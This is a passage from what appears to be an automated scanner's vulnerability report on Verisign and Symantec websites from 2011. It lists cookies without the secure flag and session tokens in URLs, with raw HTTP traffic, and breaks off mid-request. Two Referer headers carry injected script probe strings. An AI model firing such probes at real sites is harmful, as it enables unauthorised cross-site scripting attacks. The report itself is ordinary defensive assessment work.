GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line {    position
...[SNIP]...

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 30719
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0}
a:link,a:visited{color:#1446A8;text-decoration:underline}
h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}
...[SNIP]...

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/visual-sciences/vip/zig.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:55 GMT
Server: Apache
Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT
Accept-Ranges: bytes
Content-Length: 2602
Expires: Sun, 09 Oct 2011 21:47:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//REFERENCE PAGE TAG
var ct = "<img src=";
var cd = "//www.verisign.com"; //this should contain the domain of the web site
var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai
...[SNIP]...

6.67. https://www4.symantec.com/Vrt/wl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.symantec.com
Path:   /Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1
Host: www4.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:34:28 GMT
Content-type: text/html
X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ]
Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/
Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


7. Session token in URL
There are 15 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://idprotect.verisign.com/images/favicon.ico

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache
Location: https://idprotect.verisign.com/images/favicon.ico
Content-Length: 330
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.2. https://idprotect.verisign.com/kaptcha.jpg

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /kaptcha.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://idprotect.verisign.com/toolbar/activate.v
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive
Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:49:00 GMT
Server: Apache
Location: https://idprotect.verisign.com/kaptcha.jpg
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.3. https://idprotect.verisign.com/scripts/global.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /scripts/global.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:47:12 GMT
Server: Apache
Location: https://idprotect.verisign.com/scripts/global.js
Content-Length: 329
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://idprotect.veris
...[SNIP]...

7.4. https://idprotect.verisign.com/toolbar/activate.v

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:48:59 GMT
Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Length: 7564
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<meta http-equiv="Expires" content="0" />

<link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/>

<title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print"
href="/common/styles/print.css" />

<script type="text/javascript"
src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc">
</script>
...[SNIP]...
<br/>

<img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" />&nbsp;&nbsp;
<img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

7.5. http://m.verisign.com/home.v

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://m.verisign.com
Path:   /home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:03:49 GMT
Server: Apache
Location: http://vipmobile.verisign.com/home.v
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/ubox/image

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif
Content-Length: 0
Date: Fri, 09 Sep 2011 21:24:33 GMT
Server: Test & Target


7.8. http://player.ooyala.com/sas/authorized

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://player.ooyala.com
Path:   /sas/authorized

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Status: 200 OK
Content-Type: text/xml
Content-Length: 716
Cache-Control: public, no-cache
Date: Fri, 09 Sep 2011 21:26:08 GMT
Connection: close

iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn
h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9
kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO
JotiY/UdyOFK+TiH1
...[SNIP]...

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://renewals.symantec.com
Path:   /renewals/images/icon-pop-up.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
